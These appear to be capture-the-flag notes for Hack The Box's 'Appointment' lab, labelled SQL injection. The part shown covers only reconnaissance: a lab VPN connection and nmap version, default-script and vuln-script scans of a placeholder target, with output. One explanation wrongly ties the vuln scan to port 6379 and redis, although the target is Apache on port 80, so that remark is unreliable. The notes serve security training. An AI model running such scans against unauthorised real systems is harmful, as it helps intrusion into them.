01.APPOINTMENT (SQL INJECTION)

root@oco:~$ sudo openvpn ~/Downloads/starting_point.ovpn

root@oco:~$ nmap -sV -T4 {targetIP} -p-
 PORT     STATE SERVICE       VERSION
 80/tcp   open  http          Apache httpd 2.4.38 ((Debian))

root@htb:~$ nmap -sV -sC -T4 {targetIP} -p 80
 PORT   STATE SERVICE VERSION
 80/tcp open  http    Apache httpd 2.4.38 ((Debian))
 |_http-server-header: Apache/2.4.38 (Debian)
 |_http-title: Login

 * the -SC runs the default set of Nmap scripts (NSE scripts), which typically include
   scripts for service enumeration, version detection, and other basic checks.
   
root@htb:~$ sudo nmap --script=vuln {targetIP} -p 80
 PORT   STATE SERVICE
 80/tcp open  http
 | http-internal-ip-disclosure: 
 |_  Internal IP Leaked: 127.0.0.1
 |_http-vuln-cve2017-1001000: ERROR: Script execution failed (use -d to debug)
 |_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
 | http-fileupload-exploiter: 
 |   
 |_    Couldn't find a file-type field.
 |_http-csrf: Couldn't find any CSRF vulnerabilities.
 | http-enum: 
 |   /css/: Potentially interesting directory w/ listing on 'apache/2.4.38 (debian)'
 |   /images/: Potentially interesting directory w/ listing on 'apache/2.4.38 (debian)'
 |   /js/: Potentially interesting directory w/ listing on 'apache/2.4.38 (debian)'
 |_  /vendor/: Potentially interesting directory w/ listing on 'apache/2.4.38 (debian)'
 |_http-dombased-xss: Couldn't find any DOM based XSS.

 * the --script=vuln will run scripts that focus specifically on detecting known 
   vulnerabilities in the service running on port 6379
    - e.g., weak configurations, or known vulnerabilities in the redis service
       - if no results are found then the service may be fully patched!